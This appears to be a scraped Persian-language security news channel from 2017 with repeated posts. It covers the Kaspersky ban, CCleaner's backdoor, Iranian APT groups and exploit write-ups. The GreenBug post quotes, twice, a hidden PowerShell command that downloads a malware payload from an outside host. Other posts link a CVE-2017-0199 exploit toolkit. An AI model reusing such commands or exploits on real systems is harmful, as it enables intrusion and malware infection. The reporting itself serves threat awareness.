امنیت اطلاعات
سه راه برای وارد شدن به دانشگاه هاروارد از نظر جولیان آسانژ (مالک ویکی لیکس): رشوه بده مورد تایید CIA باش (بعد از رد افشاگر CIA،چلسی منینگ برای رفتن به هاروارد) آسیایی نباش!
منابع :
https://twitter.com/wikileaks/status/590203087333232640?lang=en
https://www.nytimes.com/2017/09/15/opinion/chelsea-manning-harvard-michael-morell.html?mcubz=3&_r=0
https://www.unz.com/runz/the-myth-of-american-meritocracy/
https://twitter.com/wikileaks/status/590203087333232640?lang=en
https://www.nytimes.com/2017/09/15/opinion/chelsea-manning-harvard-michael-morell.html?mcubz=3&_r=0
https://www.unz.com/runz/the-myth-of-american-meritocracy/
Twitter
WikiLeaks
How to really get into Harvard: https://t.co/IXUEOBREL9 More https://t.co/BcF6nBAica https://t.co/gmWdO5kQ2k
امنیت اطلاعات
دپارتمان امنیت داخلی امریکا، استفاده از محصولات شرکت روس kaspersky رو برای تمام ادارات دولتی ممنوع اعلام کرد. https://securityaffairs.co/wordpress/63013/intelligence/dhs-kaspersky-lab-ban.html #usa #russia #nsa #kaspersky
به گزارش بی بی سی بعد از اعلام بلومبرگ مبنی بر ارسال ایمیل مدیر اجرایی kaspersky به کارمند سابق این شرکت که در اون در مورد یک پروژه امنیتی که با سرویس امنیتی دولت روسیه در حال اجرا هستند توضیح داده ، دولت امریکا استفاده از تمامی محصولات کسپرسکای رو در ادارات دولتی ممنوع اعلام کرد.
کسپرسکای در حال حاضر بیش از ۴۰۰ میلیون مشتری و کاربر در تمام دنیا داره و بلومبرگ اعلام کرده ابزارهای این شرکت نه تنها در مورد حملات سایبری آدرس اشتباهی میدن بلکه هکرهای شناسایی شده در طی این حملات رو به سرویس امنیتی روسیه (FSB) معرفی میکنن.
اما کسپرسکای معتقده این اطلاعات حقیقت نداشته و این شرکت قربانی درگیری و رقابت سیاسی بین این دو کشور هست.
#news
#usa
#russia
#fsb
#nsa
#cia
#kaspersky
کسپرسکای در حال حاضر بیش از ۴۰۰ میلیون مشتری و کاربر در تمام دنیا داره و بلومبرگ اعلام کرده ابزارهای این شرکت نه تنها در مورد حملات سایبری آدرس اشتباهی میدن بلکه هکرهای شناسایی شده در طی این حملات رو به سرویس امنیتی روسیه (FSB) معرفی میکنن.
اما کسپرسکای معتقده این اطلاعات حقیقت نداشته و این شرکت قربانی درگیری و رقابت سیاسی بین این دو کشور هست.
#news
#usa
#russia
#fsb
#nsa
#cia
#kaspersky
توضیحی در مورد نحوه هک کردن پرینترها
https://0x00sec.org/t/an-introduction-to-printer-exploitation-1/3565
#printer
#network
#nmap
#smb
#shodan
@sec_nerd
https://0x00sec.org/t/an-introduction-to-printer-exploitation-1/3565
#printer
#network
#nmap
#smb
#shodan
@sec_nerd
0x00sec - The Home of the Hacker
An Introduction to Printer Exploitation
> Preface Note: As always the following is just a digest of all the things I could observe by working on printers myself or facts from stuff I read about recently. Since this thread about the HP printer promo videos caught some attention I will try to shed…
پلاگین decoder برای افزایش قابلیت های دکدینگ Burp suite
https://github.com/nccgroup/Decoder-Improved
#burpsuite
#decoder
#jar
@sec_nerd
https://github.com/nccgroup/Decoder-Improved
#burpsuite
#decoder
#jar
@sec_nerd
Exploiting CVE-2017-8759: SOAP WSDL Parser Code Injection
https://www.mdsec.co.uk/2017/09/exploiting-cve-2017-8759-soap-wsdl-parser-code-injection/
#xml
#wsdl
@sec_nerd
https://www.mdsec.co.uk/2017/09/exploiting-cve-2017-8759-soap-wsdl-parser-code-injection/
#xml
#wsdl
@sec_nerd
MDSec
Exploiting CVE-2017-8759: SOAP WSDL Parser Code Injection - MDSec
Introduction CVE-2017-8759, the vulnerability recently discovered by FireEye as being exploited in the wild is a code injection vulnerability that occurs in the .NET framework when parsing a WSDL using...
امنیت اطلاعات
دیتابیس سایت امریکایی equifax برای فروش در دارکنت قرار داده شده! قیمت : 600 بیت کوین! #news #breach #equifax
حل مسائل فیزیک در لینوکس
https://www.linuxjournal.com/content/solving-physics-problems-linux
#linux
#calculation
@sec_nerd
https://www.linuxjournal.com/content/solving-physics-problems-linux
#linux
#calculation
@sec_nerd
سایت clearsky در گزارشی، توضیحاتی در مورد فعالیت های گروه ایرانی GreenBug ارائه کرد.این گروه از تروجانی به نام ISMAgent برای آلوده کردن سیستمها استفاده میکنند.ابزار مورد استفاده در این حملات از آسیب پذیری آفیس با کد CVE-2017-0199 استفاده کرده که توضیحات بیشتری در مورد این باگ در https://github.com/bhdresh/CVE-2017-0199 به همراه ابزار مورد نیاز موجود هست. این حمله با فراخوانی ظاهری فایلی به اسم template.rtf و اجرای دستور:
“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nologo -WindowStyle Hidden $webClient = New-Object https://System.Net .WebClient; $val = $webClient.DownloadString(‘https://a.pomf[.]cat/ntluca.txt ‘); add-content -path ‘C:\Users\USER\AppData\Roaming/srvRep.txt’ -value $val -force
در پشت صحنه فایل ntluca.txt رو که فایل اصلی این حمله هست دانلود و دکد میکنه (base64 digital certificate) .
توضیحات بیشتر :
https://www.clearskysec.com/ismagent/
#iran
#usa
#ksa
#israel
#russia
#malware
#windows
#greenbug
@sec_nerd
“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nologo -WindowStyle Hidden $webClient = New-Object https://System.Net .WebClient; $val = $webClient.DownloadString(‘https://a.pomf[.]cat/ntluca.txt ‘); add-content -path ‘C:\Users\USER\AppData\Roaming/srvRep.txt’ -value $val -force
در پشت صحنه فایل ntluca.txt رو که فایل اصلی این حمله هست دانلود و دکد میکنه (base64 digital certificate) .
توضیحات بیشتر :
https://www.clearskysec.com/ismagent/
#iran
#usa
#ksa
#israel
#russia
#malware
#windows
#greenbug
@sec_nerd
GitHub
GitHub - bhdresh/CVE-2017-0199: Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security…
Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a maliciou...
معرفی گروه هکرهای ایرانی CopyKittens
این گروه که در سال 2013 فعالیت خودش رو شروع کرده بیشتر بر روی اهداف خارجی تمرکز داره و تابه حال اهدافی از اسرائیل،عربستان،ترکیه،امریکا،اردن و آلمان و بعضاً کارمندان سازمان ملل رو مورد نفوذ قرار داده. اهداف معمولا شامل مراکز دولتی(مانند وزارت خارجه)ُ مراکز علمی، کمپانی های جنگی،شرکت های طرف قرارداد وزارت جنگ و شرکت های بزرگ IT بوده اند.
روش مورد استفاده معمولا با پایه ریزی حمله از یک حساب هک شده متعلق به مکانی مورد اعتماد مثل وزارت خارجه شروع شده و هکرها سعی داشتند با انتشار داکیومنت آلوده از طریق ایمیل، اهداف رو در سازمان های دولتی دیگر مورد نفوذ قرار بدن. به عنوان مثال با سرقت یک داکیومنت از وزارت خارجه ترکیه به عنوان تله (decoy) از اون استفاده میشده. در این حملات سفارت های اسراییل در نقاط مختلف و همچنین وزارت خارجه این رژیم مورد نفوذ قرار گرفته.
این گروه از بدافزارهای تولیدی خودشان به همراه ابزارهای پابلیک استفاده میکنند که در لیست زیر میبینید:
TDTESS backdoor
Vminst (ابزاری برای حرکت در شبکه - lateral movement)
NetSrv (لود کننده Cobalt strike)
ZPP (برنامه فشرده سازی)
Matryoshka (بدافزار ساخت این گروه)
سایر ابزارها :
metasploit
mimikatz
Empire
havij,acunetix,sqlmap
زیرساخت های مورد استفاده در حملات این گروه معمولا از کشورهای روسیه و هلند بوده و برای نفوذها، وبسایتها رو هم مورد حمله قرار میدادند.
توضیحات بیشتر :
https://www.clearskysec.com/tulip/
#iran
#usa
#ksa
#israel
#russia
#malware
#copykittens
این گروه که در سال 2013 فعالیت خودش رو شروع کرده بیشتر بر روی اهداف خارجی تمرکز داره و تابه حال اهدافی از اسرائیل،عربستان،ترکیه،امریکا،اردن و آلمان و بعضاً کارمندان سازمان ملل رو مورد نفوذ قرار داده. اهداف معمولا شامل مراکز دولتی(مانند وزارت خارجه)ُ مراکز علمی، کمپانی های جنگی،شرکت های طرف قرارداد وزارت جنگ و شرکت های بزرگ IT بوده اند.
روش مورد استفاده معمولا با پایه ریزی حمله از یک حساب هک شده متعلق به مکانی مورد اعتماد مثل وزارت خارجه شروع شده و هکرها سعی داشتند با انتشار داکیومنت آلوده از طریق ایمیل، اهداف رو در سازمان های دولتی دیگر مورد نفوذ قرار بدن. به عنوان مثال با سرقت یک داکیومنت از وزارت خارجه ترکیه به عنوان تله (decoy) از اون استفاده میشده. در این حملات سفارت های اسراییل در نقاط مختلف و همچنین وزارت خارجه این رژیم مورد نفوذ قرار گرفته.
این گروه از بدافزارهای تولیدی خودشان به همراه ابزارهای پابلیک استفاده میکنند که در لیست زیر میبینید:
TDTESS backdoor
Vminst (ابزاری برای حرکت در شبکه - lateral movement)
NetSrv (لود کننده Cobalt strike)
ZPP (برنامه فشرده سازی)
Matryoshka (بدافزار ساخت این گروه)
سایر ابزارها :
metasploit
mimikatz
Empire
havij,acunetix,sqlmap
زیرساخت های مورد استفاده در حملات این گروه معمولا از کشورهای روسیه و هلند بوده و برای نفوذها، وبسایتها رو هم مورد حمله قرار میدادند.
توضیحات بیشتر :
https://www.clearskysec.com/tulip/
#iran
#usa
#ksa
#israel
#russia
#malware
#copykittens
مانیتورینگ فعالیت های کاربران و دستورات اجرا شده توسط آنها در سیستم عامل لینوکس
https://www.tecmint.com/monitor-linux-commands-executed-by-system-users-in-real-time/
#linux
#administration
#security
https://www.tecmint.com/monitor-linux-commands-executed-by-system-users-in-real-time/
#linux
#administration
#security
هکرها نسخه ۵.۳۳ برنامه ccleaner رو از سرور این برنامه آلوده به بکدور کردند. اگر از این نسخه استفاده میکنید شما هم قربانی این حمله هستید.
این برنامه میلیونها کاربر در سراسر جهان داره.
https://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
#news
#ccleaner
#backdoor
#malware
@sec_nerd
این برنامه میلیونها کاربر در سراسر جهان داره.
https://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
#news
#ccleaner
#backdoor
#malware
@sec_nerd
Cisco Talos Blog
CCleanup: A Vast Number of Machines at Risk
Update 9/18: CCleaner Cloud version 1.07.3191 is also reported to be affected
Update 9/19: This issue was discovered and reported by both Morphisec and Cisco in separate in-field cases and reported separately to Avast.
Update 9/19: There has been some confusion…
Update 9/19: This issue was discovered and reported by both Morphisec and Cisco in separate in-field cases and reported separately to Avast.
Update 9/19: There has been some confusion…
Run Linux or other Operating Systems in your browser !
https://bellard.org/jslinux/
#js
#linux
#vm
@sec_nerd
https://bellard.org/jslinux/
#js
#linux
#vm
@sec_nerd
وب سایت piratebay به عنوان یکی از ارائه دهندگان خدمات تورنت و جستجوی فایل های تورنت در دنیا مشهور هست.
این وب سایت اخیرا در فوتر صفحه از اسکریپت جاوایی استفاده میکنه که با اون قادر هست از CPU سیستم بازدید کنندگان برای ماین کردن بیت کوین استفاده کنه.
اطلاعات بیشتر:
https://torrentfreak.com/the-pirate-bay-website-runs-a-cryptocurrency-miner-170916/
#torrent
#btc
#miner
#js
#fraud
#piratebay
@sec_nerd
این وب سایت اخیرا در فوتر صفحه از اسکریپت جاوایی استفاده میکنه که با اون قادر هست از CPU سیستم بازدید کنندگان برای ماین کردن بیت کوین استفاده کنه.
اطلاعات بیشتر:
https://torrentfreak.com/the-pirate-bay-website-runs-a-cryptocurrency-miner-170916/
#torrent
#btc
#miner
#js
#fraud
#piratebay
@sec_nerd
Torrentfreak
The Pirate Bay Website Runs a Cryptocurrency Miner (Updated) * TorrentFreak
A few hours ago a cryptocurrency miner appeared on The Pirate Bay website, using the computer resources of visitors to mine Monero coins. The operators of The Pirate Bay are testing it as a new way to generate revenue, but many users aren't happy.